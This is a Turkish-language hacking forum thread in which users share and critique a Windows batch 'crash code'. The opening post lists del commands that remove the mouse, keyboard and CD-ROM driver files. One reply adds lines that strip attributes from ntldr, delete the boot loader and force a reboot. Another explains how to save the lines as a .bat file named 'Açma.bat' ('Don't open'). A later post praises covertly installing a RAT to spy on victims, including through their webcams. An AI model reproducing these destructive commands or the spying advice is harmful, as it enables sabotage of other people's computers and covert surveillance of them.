Etkili Bir Çökertme Kodu [Format Bile Atılamaz]

BarisJKaraali

Kıdemli Üye
5 May 2013
2,653
0
Istanbul
del C:/WINDOWS/system/MOUSE.DRV
del C:/WINDOWS/system/KEYBOARD.DRV
del c:\WINDOWS\system32\drivers\cdrom.bat

şimdik burdaki kodlar maus - klavye ve cdrom driverlerini siliyor şimdi arkadaş demiski format bile atılmaz peki güzel kardeşim sen harddiskki aldıgında herhangi bi işletim sistemi yüklü olmuyor peki biz buna nasıl yüklüyoruz işletim sistemi yada mause ve klavye yada cd-rom nasıl calısıyo bi anlatsana merak ettim :D

BUnlar olmadığında şu çözüm uygulanabilir...

dokunmatik ekran
USB format
öğrenin bunları ;)

malictrl

Yeni üye
20 Ara 2010
4
0
Arkadaşlar lutfen burası tht lütfen .bat mı kaldı artık , ayrıca burada bilgisayarı cokertecek bir kod yok ancak bu sekilde değiştirilirse belki bir işe yarayabilir.

cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
del C:\WINDOWS\system\MOUSE.DRV
del C:\WINDOWS\system\KEYBOARD.DRV
del c:\WINDOWS\system32\drivers\cdrom.bat
shutdown -r

ancak tekrar soyluyorum yıl olmuş 2013 bunu yiyen insanlara ve bunu yapıp kendini avutanlara birşey diyemiyorum hala bu tip şeylere bel bağlıyorsanız bu işi bırakın.

erdemata

Üye
21 Eyl 2012
76
0
bat ne ya Allah aşkına bunu yiyen mi olcak, ayrıca bu kodları bırak antivirüsü ben bile engellerim :D, bide bilgisayar çökerttiği falan yok sadece driver siliyo yani hem yalan hem gereksiz...

humanz

Yeni üye
30 May 2013
4
0
format cd si diyer sun ama flaş bellekten de format atabilir biraz daha gayretet hayırlı işler iyi günler

16 Eki 2013
246
0
kastın_neydi
Arkadaşlar biliyorsunuz bunlar bat kodları ,not defterine yapıştırıp farklı kaydet dedikten sonra dosya isminin uzantısını .bat olarak degiştirin örn: Açma.bat
hepsi bu kadar etkilidir kendi makinanızda denemeyin sonraası vahim (başıma geldi)

94loyka55

Katılımcı Üye
19 Ocak 2013
541
0
bu virüs değil bile siz nesiniz böyle ya yazılımla donanımı etkisiz hale getirmek çalışamaz yapmak imkansızdır milleti kandırmayın yöneticiler artık bişeyler yapın

jaqen

Yeni üye
23 Nis 2015
48
0
Driver silmekten başka birşey yapmaz. Formatla düzelir boşu boşuna arkadaşlarınızın gözünde düşmeyin akıllı olun. İyi bir hacker kendini belli etmez. Lamerlık yapıp milletin pc'sini çökertmez. Adam gibi ratını yapar yedirir gece gündüz bilgisayarını izler, dinler. Asla ve asla kendini belli etmez. Ha biraz abazaysa kızların webcamini izler ama o bile iyidir.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.